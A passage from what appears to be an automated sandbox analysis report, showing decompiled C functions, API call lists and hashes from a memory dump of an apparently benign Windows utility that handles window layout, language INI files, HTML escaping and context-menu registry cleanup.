                                                                                      • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                      • String ID: %d %I64x
                                                                                      • API String ID: 2567117392-2565891505
                                                                                      • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                      • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                      • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                      • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 39%
                                                                                      			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                      				void* _v8;
                                                                                      				void _v2054;
                                                                                      				short _v2056;
                                                                                      				void _v4102;
                                                                                      				short _v4104;
                                                                                      				signed int _t28;
                                                                                      				void* _t34;
                                                                                      
                                                                                      				E0040B550(0x1004, __ecx);
                                                                                      				_t36 = 0;
                                                                                      				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                      					_v2056 = 0;
                                                                                      					memset( &_v2054, 0, 0x7fe);
                                                                                      					_v4104 = 0;
                                                                                      					memset( &_v4102, 0, 0x7fe);
                                                                                      					_t34 = __ebx + 0x20a;
                                                                                      					_push(_t34);
                                                                                      					_push(__ebx);
                                                                                      					_push(L"%s\\shell\\%s\\command");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v2056);
                                                                                      					L0040B1EC();
                                                                                      					_push(_t34);
                                                                                      					_push(__ebx);
                                                                                      					_push(L"%s\\shell\\%s");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v4104);
                                                                                      					L0040B1EC();
                                                                                      					RegDeleteKeyW(_v8,  &_v2056);
                                                                                      					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                      					asm("sbb esi, esi");
                                                                                      					_t36 =  ~_t28 + 1;
                                                                                      					RegCloseKey(_v8);
                                                                                      				}
                                                                                      				return _t36;
                                                                                      			}











                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Delete_snwprintfmemset$Close
                                                                                      • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                      • API String ID: 1018939227-3575174989
                                                                                      • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                      • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E0040313D(void* __ecx) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v12;
                                                                                      				struct HWND__* _t6;
                                                                                      				_Unknown_base(*)()* _t11;
                                                                                      				struct HWND__* _t15;
                                                                                      				void* _t20;
                                                                                      				struct HINSTANCE__* _t23;
                                                                                      
                                                                                      				_v12 = 8;
                                                                                      				_v8 = 0xff;
                                                                                      				_t15 = 0;
                                                                                      				_t20 = 0;
                                                                                      				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                      				if(_t23 == 0) {
                                                                                      					L5:
                                                                                      					__imp__#17();
                                                                                      					_t6 = 1;
                                                                                      					L6:
                                                                                      					if(_t6 != 0) {
                                                                                      						return 1;
                                                                                      					} else {
                                                                                      						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                      						return 0;
                                                                                      					}
                                                                                      				}
                                                                                      				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                      				if(_t11 != 0) {
                                                                                      					_t20 = 1;
                                                                                      					_t15 =  *_t11( &_v12);
                                                                                      				}
                                                                                      				FreeLibrary(_t23);
                                                                                      				if(_t20 == 0) {
                                                                                      					goto L5;
                                                                                      				} else {
                                                                                      					_t6 = _t15;
                                                                                      					goto L6;
                                                                                      				}
                                                                                      			}











                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                      • API String ID: 2780580303-317687271
                                                                                      • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                      • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				struct tagRECT _v44;
                                                                                      				int _t50;
                                                                                      				long _t61;
                                                                                      				struct HDC__* _t63;
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t68;
                                                                                      				struct HWND__* _t71;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t73;
                                                                                      				int _t74;
                                                                                      				int _t80;
                                                                                      				int _t83;
                                                                                      
                                                                                      				_t73 = __edx;
                                                                                      				_v8 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_t74 = GetSystemMetrics(0x11);
                                                                                      				_t80 = GetSystemMetrics(0x10);
                                                                                      				if(_t74 == 0 || _t80 == 0) {
                                                                                      					_t63 = GetDC(0);
                                                                                      					_t80 = GetDeviceCaps(_t63, 8);
                                                                                      					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                      					ReleaseDC(0, _t63);
                                                                                      				}
                                                                                      				GetWindowRect(_a4,  &_v44);
                                                                                      				if((_a8 & 0x00000004) != 0) {
                                                                                      					_t71 = GetParent(_a4);
                                                                                      					if(_t71 != 0) {
                                                                                      						_v28.left = _v28.left & 0x00000000;
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						GetWindowRect(_t71,  &_v28);
                                                                                      						_t61 = _v28.left;
                                                                                      						_t72 = _v28.top;
                                                                                      						_t80 = _v28.right - _t61 + 1;
                                                                                      						_t74 = _v28.bottom - _t72 + 1;
                                                                                      						_v8 = _t61;
                                                                                      						_v12 = _t72;
                                                                                      					}
                                                                                      				}
                                                                                      				_t65 = _v44.right;
                                                                                      				if((_a8 & 0x00000001) == 0) {
                                                                                      					asm("cdq");
                                                                                      					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                      				} else {
                                                                                      					_t83 = 0;
                                                                                      				}
                                                                                      				_t68 = _v44.bottom;
                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                      					L11:
                                                                                      					_t50 = 0;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					asm("cdq");
                                                                                      					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                      					if(_t50 >= 0) {
                                                                                      						L12:
                                                                                      						if(_t83 < 0) {
                                                                                      							_t83 = 0;
                                                                                      						}
                                                                                      						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                      					}
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}



















                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                      • GetDC.USER32(00000000), ref: 00404DD5
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                      • ReleaseDC.USER32 ref: 00404DF4
                                                                                      • GetWindowRect.USER32 ref: 00404E07
                                                                                      • GetParent.USER32(?), ref: 00404E12
                                                                                      • GetWindowRect.USER32 ref: 00404E2F
                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                      • String ID:
                                                                                      • API String ID: 2163313125-0
                                                                                      • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                      • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 88%
                                                                                      			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                      				void* __esi;
                                                                                      				void* _t3;
                                                                                      				int _t6;
                                                                                      
                                                                                      				_t3 = E00404AAA(_a4);
                                                                                      				if(_t3 != 0) {
                                                                                      					wcscpy(0x40fb90, _a4);
                                                                                      					wcscpy(0x40fda0, L"general");
                                                                                      					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                      					asm("sbb eax, eax");
                                                                                      					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                      					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                      					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                      					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                      				}
                                                                                      				return _t3;
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                      • wcscpy.MSVCRT ref: 004063B2
                                                                                      • wcscpy.MSVCRT ref: 004063C2
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                        • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 3176057301-2039793938
                                                                                      • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                      • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                      				void* _t2;
                                                                                      				signed short* _t3;
                                                                                      				void* _t7;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      
                                                                                      				_t3 = __eax;
                                                                                      				_t8 = __ecx;
                                                                                      				_t7 = 8;
                                                                                      				while(1) {
                                                                                      					_t2 =  *_t3 & 0x0000ffff;
                                                                                      					if(_t2 != 0x3c) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      					_push(_t7);
                                                                                      					_push(L"&lt;");
                                                                                      					L14:
                                                                                      					_t2 = memcpy(_t8, ??, ??);
                                                                                      					_t10 = _t10 + 0xc;
                                                                                      					_t8 = _t8 + _t7;
                                                                                      					L16:
                                                                                      					if( *_t3 != 0) {
                                                                                      						_t3 =  &(_t3[1]);
                                                                                      						continue;
                                                                                      					}
                                                                                      					return _t2;
                                                                                      					L3:
                                                                                      					if(_t2 != 0x3e) {
                                                                                      						if(_t2 != 0x22) {
                                                                                      							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                      								if(_t2 != 0x26) {
                                                                                      									if(_t2 != 0xa) {
                                                                                      										 *_t8 = _t2;
                                                                                      										_t8 = _t8 + 2;
                                                                                      									} else {
                                                                                      										_push(_t7);
                                                                                      										_push(L"<br>");
                                                                                      										goto L14;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_push(0xa);
                                                                                      									_push(L"&amp;");
                                                                                      									goto L11;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_push(0xa);
                                                                                      								_push(L"&deg;");
                                                                                      								L11:
                                                                                      								_t2 = memcpy(_t8, ??, ??);
                                                                                      								_t10 = _t10 + 0xc;
                                                                                      								_t8 = _t8 + 0xa;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                      							_t10 = _t10 + 0xc;
                                                                                      							_t8 = _t8 + 0xc;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_push(_t7);
                                                                                      						_push(L"&gt;");
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				}
                                                                                      			}









                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      • API String ID: 3510742995-3273207271
                                                                                      • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                      • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                      				struct HDWP__* _v8;
                                                                                      				intOrPtr* _v12;
                                                                                      				void _v534;
                                                                                      				short _v536;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t42;
                                                                                      				intOrPtr* _t95;
                                                                                      				RECT* _t96;
                                                                                      
                                                                                      				_t95 = __ecx;
                                                                                      				_v12 = __ecx;
                                                                                      				if(_a4 == 0x233) {
                                                                                      					_v536 = 0;
                                                                                      					memset( &_v534, 0, 0x208);
                                                                                      					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                      					DragFinish(_a8);
                                                                                      					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                      					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                      					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                      					_t95 = _v12;
                                                                                      				}
                                                                                      				if(_a4 != 5) {
                                                                                      					if(_a4 != 0xf) {
                                                                                      						if(_a4 == 0x24) {
                                                                                      							_t42 = _a12;
                                                                                      							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                      							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                      						}
                                                                                      					} else {
                                                                                      						E00402EC8(_t95 + 0x40);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v8 = BeginDeferWindowPos(0xd);
                                                                                      					_t96 = _t95 + 0x40;
                                                                                      					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                      					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                      					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                      					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                      					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                      					EndDeferWindowPos(_v8);
                                                                                      					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                      					_t95 = _v12;
                                                                                      				}
                                                                                      				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                      			}













                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040421E
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                      • DragFinish.SHELL32(?), ref: 0040423F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                      • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                      • String ID: $
                                                                                      • API String ID: 2142561256-3993045852
                                                                                      • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                      • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 55%
                                                                                      			E00405B81(signed short __ebx) {
                                                                                      				signed int _t21;
                                                                                      				void* _t22;
                                                                                      				struct HINSTANCE__* _t25;
                                                                                      				signed int _t27;
                                                                                      				void* _t35;
                                                                                      				signed short _t39;
                                                                                      				signed int _t40;
                                                                                      				void* _t57;
                                                                                      				int _t61;
                                                                                      				void* _t62;
                                                                                      				int _t71;
                                                                                      
                                                                                      				_t39 = __ebx;
                                                                                      				if( *0x41c470 == 0) {
                                                                                      					E00405ADF();
                                                                                      				}
                                                                                      				_t40 =  *0x41c468;
                                                                                      				_t21 = 0;
                                                                                      				if(_t40 <= 0) {
                                                                                      					L5:
                                                                                      					_t57 = 0;
                                                                                      				} else {
                                                                                      					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                      						_t21 = _t21 + 1;
                                                                                      						if(_t21 < _t40) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                      				}
                                                                                      				L6:
                                                                                      				if(_t57 != 0) {
                                                                                      					L21:
                                                                                      					_t22 = _t57;
                                                                                      				} else {
                                                                                      					if((_t39 & 0x00010000) == 0) {
                                                                                      						if( *0x40fb90 == 0) {
                                                                                      							_push( *0x41c478 - 1);
                                                                                      							_push( *0x41c45c);
                                                                                      							_push(_t39);
                                                                                      							_t25 = E00405CE7();
                                                                                      							goto L15;
                                                                                      						} else {
                                                                                      							wcscpy(0x40fda0, L"strings");
                                                                                      							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                      							_t62 = _t62 + 0x10;
                                                                                      							if(_t35 == 0) {
                                                                                      								L13:
                                                                                      								_t25 = GetModuleHandleW(0);
                                                                                      								_push( *0x41c478 - 1);
                                                                                      								_push( *0x41c45c);
                                                                                      								_push(_t39);
                                                                                      								goto L15;
                                                                                      							} else {
                                                                                      								_t61 = wcslen( *0x41c45c);
                                                                                      								if(_t61 == 0) {
                                                                                      									goto L13;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t25 = GetModuleHandleW(_t57);
                                                                                      						_push( *0x41c478 - 1);
                                                                                      						_push( *0x41c45c);
                                                                                      						_push(_t39 & 0x0000ffff);
                                                                                      						L15:
                                                                                      						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                      						_t71 = _t61;
                                                                                      					}
                                                                                      					if(_t71 <= 0) {
                                                                                      						L20:
                                                                                      						_t22 = 0x40c4e8;
                                                                                      					} else {
                                                                                      						_t27 =  *0x41c46c;
                                                                                      						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                      							goto L20;
                                                                                      						} else {
                                                                                      							_t57 =  *0x41c458 + _t27 * 2;
                                                                                      							_t14 = _t61 + 2; // 0x2
                                                                                      							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                      							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                      							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                      							 *0x41c468 =  *0x41c468 + 1;
                                                                                      							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                      							if(_t57 != 0) {
                                                                                      								goto L21;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t22;
                                                                                      			}














                                                                                      0x00405c2a
                                                                                      0x00405c18
                                                                                      0x00405bbf
                                                                                      0x00405bc0
                                                                                      0x00405bcd
                                                                                      0x00405bce
                                                                                      0x00405bd7
                                                                                      0x00405c58
                                                                                      0x00405c5f
                                                                                      0x00405c61
                                                                                      0x00405c61
                                                                                      0x00405c63
                                                                                      0x00405cdb
                                                                                      0x00405cdb
                                                                                      0x00405c65
                                                                                      0x00405c65
                                                                                      0x00405c74
                                                                                      0x00000000
                                                                                      0x00405c84
                                                                                      0x00405c8a
                                                                                      0x00405c8d
                                                                                      0x00405c99
                                                                                      0x00405caf
                                                                                      0x00405cbd
                                                                                      0x00405cc8
                                                                                      0x00405cd4
                                                                                      0x00405cd9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405cd9
                                                                                      0x00405c74
                                                                                      0x00405c63
                                                                                      0x00405ce6

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                      • wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                        • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                      • wcslen.MSVCRT ref: 00405C20
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                      • memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                      • String ID: strings
                                                                                      • API String ID: 3166385802-3030018805
                                                                                      • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
